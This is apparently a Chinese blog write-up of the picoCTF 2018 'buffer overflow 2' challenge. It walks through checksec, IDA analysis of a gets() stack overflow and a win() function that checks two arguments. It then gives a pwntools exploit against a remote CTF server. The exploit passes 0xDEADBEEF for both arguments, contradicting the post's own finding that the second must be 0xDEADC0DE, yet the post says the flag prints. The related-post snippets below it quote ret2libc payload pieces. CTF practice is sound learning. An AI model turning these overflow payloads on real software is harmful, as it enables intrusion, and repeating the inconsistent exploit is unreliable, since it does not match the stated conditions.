picoctf_2018_buffer overflow 2 1

于 2024-03-12 18:44:45 发布
阅读量344 收藏 7
点赞数 6
文章标签: 网络安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_74861133/article/details/136658955
版权

1.checksec

在这里插入图片描述

2.ida

在这里插入图片描述
在这里插入图片描述
主要漏洞在vuln()里面,gets函数有栈溢出漏洞,s距离ebp为0x6C
在这里插入图片描述
又发现可疑函数win(),点进去看发现只要该函数的两个参数a1和a2满足相应的条件(a1 == -559038737 && a2 == -559038242)就可以直接打印flag。将条件中的数字转换为16进制为a1 == 0xDEADBEEF && a2 == 0xDEADC0DE。
故该题思路为利用栈溢出溢出返回地址到win函数然后传递正确的参数a1与a2使其输出flag,先上exp。

3.exp

from pwn import*
p=remote('node5.buuoj.cn',26902)
payload=b'a'*0x70+p32(0x80485CB)+p32(0)+p32(0x0DEADBEEF)+p32(0x0DEADBEEF)
p.sendline(payload)
p.interactive()

0x80485CB为win函数地址,p32(0)为了填充win函数的返回地址,因为win函数的参数是从返回地址的下一个开始传的,可以从汇编代码看出
在这里插入图片描述
可以看出a1的地址为ebp+arg_0,a2的地址为ebp+arg_4,从上面可以看出,arg_0为8,arg_4为12,两个参数的地址是挨着的,然后ebp+4的位置正好是win函数返回地址的位置,故需要随便一个4字节的junk来填充一下该处,然后才能将0x0DEADBEEF和0x0DEADBEEF放到a1与a2对应的位置。虽然此时win函数的返回地址是不存在的,但在它返回之前就已经打印出flag了。
在这里插入图片描述
最后打印出flag

曾经满眼皆是她
关注
PicoCTF_2018_buffer_overflow_1
qq_62887641的博客
08-09 922
放入虚拟机checksec一下。发现get()函数,栈溢。找到win()后门函数。查看vuln()函数。发现flag直接
PicoCTF_2018_buffer_overflow_2
m0sway的博客
11-29 386
PicoCTF_2018_buffer_overflow_2 使用checksec查看: 开启了栈不可执行,放进IDA中查看,其实和PicoCTF_2018_buffer_overflow_1没啥变化 唯一做了变动的是win()函数: 上一题是直接跳到这个函数就能读取到flag,这题需要给win()函数两个参数a1、a2 a1需要等于0xDEADBEEF a2需要等于0xDEADC0DE 才能读取到flag。 那么直接传参即可,秒了。 exp: from pwn import * #start r
picoctf_2018_buffer overflow 0
z1r0的博客
02-14 419
picoctf_2018_buffer overflow 0 查看保护 这里会将flag输入到flag这个全局变量里,还有一个signal信号11。表示对存储的无效访问 这里的话将flag写到stderr中。然后fflush(stdeer)刷新标准错误输缓冲区,把输缓冲区里的东西打印到标准输设备上 ,也就是会打印flag。其实就是当程序造成无效内存访问的时候,就会输flag。 接着再输入参数,放到vuln函数里 这里有一个栈溢,因为输入的参数可以无限长,所以在执行栈溢时,程序会造成无效内
BUUCTF:PicoCTF_2018_buffer_overflow_1
weixin_51055545的博客
01-05 1370
先放进虚拟机中检查: 任何保护机制都没开,放到32位IDA中: 主函数很简单,进入vuln()函数看一下: 很明显有溢,进入栈中看偏移: 这里偏移为0x28,我们思路是第一次溢,去泄露libc地址,再次进行溢get shell。 第一次溢: io.recvuntil(':') payload = 'A'*0X28 payload += p32(0) payload += p32(printf) payload += p32(main) payload += p32(elf.got.
picoctf_2018_buffer overflow 1
个人笔记
04-26 104
【代码】picoctf_2018_buffer overflow 1。
BUUCTF pwn——picoctf_2018_buffer overflow 2
CNS-Enterprise BCC-1701-J
05-20 130
BUUCTF 做题练习
picoctf_2018_buffer overflow 2
qq_62887641的博客
09-26 139
32位,只开了NX很简单的程序栈溢并且有后门函数后门函数需要。
BUUCTF:PicoCTF_2018_buffer_overflow_2
weixin_51055545的博客
01-05 932
例行检查程序: 还是32位程序,没有canary,很可能是溢类的。 放到IDA中: 主函数没什么特别,进入vuln()函数看一下: 果然存在溢漏洞,两次溢,直接去get shell 第一次溢去泄露libc地址,第二次溢get shell 这里我选怎printf()函数作为泄露的函数,同样也可以选择puts()函数, 构造payload : io.recvuntil(':') payload = 'A'*0x6c payload += p32(0) payload += p32(
BUUCTF--pwn picoctf_2018_buffer overflow 0
半岛铁盒的博客
04-30 430
来查看信号函数代表的含义: 11是 SIGSEGV,表示对存储的无效访问 点进去sigsegv_handler 同时将flag的值赋予了stderr 现在知道那个信号函数的作用是: 当发生 对存储的无效访问时,会把stderr打印,即将flag的值打印 再往下有个 vuln函数 有两种解题方式 方法一: 经过前面的分析,我们知道了当发生了对 内存存储无效的访问会将flag打印来 首先ssh链接,输入密码后 方法二:将ret覆盖成put,然后输flag地址上的值, from pwn im..
计算机安全_Lab 2:Buffer Overflow Vulnerability .pdf
06-04
缓冲区溢定义为程序尝试将数据写入超预分配的固定长度缓冲区边界的条件。恶意用户可以利用此漏洞来改变程序的流控制,甚至可以执行任意代码。此漏洞由于数据存储(例如缓冲区)和控制存储(例如返回地址)的混合...
kerio_PF_buffer_overflow.nasl
11-08
kerio_PF_buffer_overflow
lcdproc_buffer_overflow.nasl
11-08
lcdproc_buffer_overflow
Introdução ao Buffer overflow 1.pdf
10-06
"Buffer Overflow基础知识" Buffer Overflow是一种常见的安全漏洞,指的是当程序向缓冲区写入数据时超过缓冲区的容量,从而导致缓冲区溢,影响程序的正常运行或使得攻击者获取非法访问权限。下面是 Buffer ...
一文解读,网络安全行业人才需求情况《网络安全产业人才发展报告》
weixin_59086772的博客
10-18 8489
随着近几天国家网络安全宣传周在全国各地开展活动,网络安全再一次成为热门话题。网络安全不再缩在小小的安全圈子里,惠及面越来越广。不少对网络安全颇有兴趣的朋友非常关心行业前景如何?该怎么提升自我能力,更快地加入网安行列。 今天雨笋君就10月13日在网络安全宣传周上发布的《2021网络安全人才报告》进行一个简单的行业前景分析。 一、网络安全行业市场发展情况 网络时代生活越来越离不开网络,与此同时发生的网络安全攻击事件、非法入侵等等一系列事件都威胁着普通人的生活。没有网络安全保障,个人和企业等重.
基于龙伯格(Luenberger)观测器的无感FOC电机矢量控制MATLAB Simulink仿真模型
10-06
基于龙伯格(Luenberger)观测器的无感FOC电机矢量控制MATLAB Simulink仿真模型 通过龙伯格观测器,我们可以在不直接测量转子角度的情况下,通过已知的电机电流、电压来估算转子角度。这种方法在控制理论和实际电机控制中具有广泛的应用,尤其是在无传感器的情况下。
web端实现《别踩白块》小游戏
10-06
通过JS实现web的《别踩白块》小游戏
python经典实例代码汇总+100例
最新发布
10-06
python经典实例代码汇总+100例
阵列天线泰勒综合法降低副瓣电平的matlab源代码
10-06
clear clc % 参数设置 Freq =30*(1e9); %频率 v_0=3*10^8;%光速 lamda = v_0/Freq ; % 波长 d = lamda * 0.6; % d为阵元间距 theta0 = (90/180)*pi; % 扫描角度 theta = 0: 0.01 : pi; % Θ为方向角 u = pi*d*(cos(theta)-cos(theta0))/lamda; %T = Chebyshev; % T为切比雪夫恒等式系数矩阵 N = 16; % N为直线阵的阵元数量,M为一侧的单元数(对称) R0dB = 20; % R0dB为副瓣电平 nbar=9; %相等电平副瓣数目 if (mod(N,2)==0) M = N / 2; parity = 0; % parity为奇偶性,0为偶数
dp_debug_check_buffer_overflow
05-25
dp_debug_check_buffer_overflow 是一个调试函数,用于检测缓冲区溢的情况。当程序运行时,如果发现有缓冲区溢的情况,就会触发 dp_debug_check_buffer_overflow 函数,并打印相应的调试信息,以便程序员进行...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值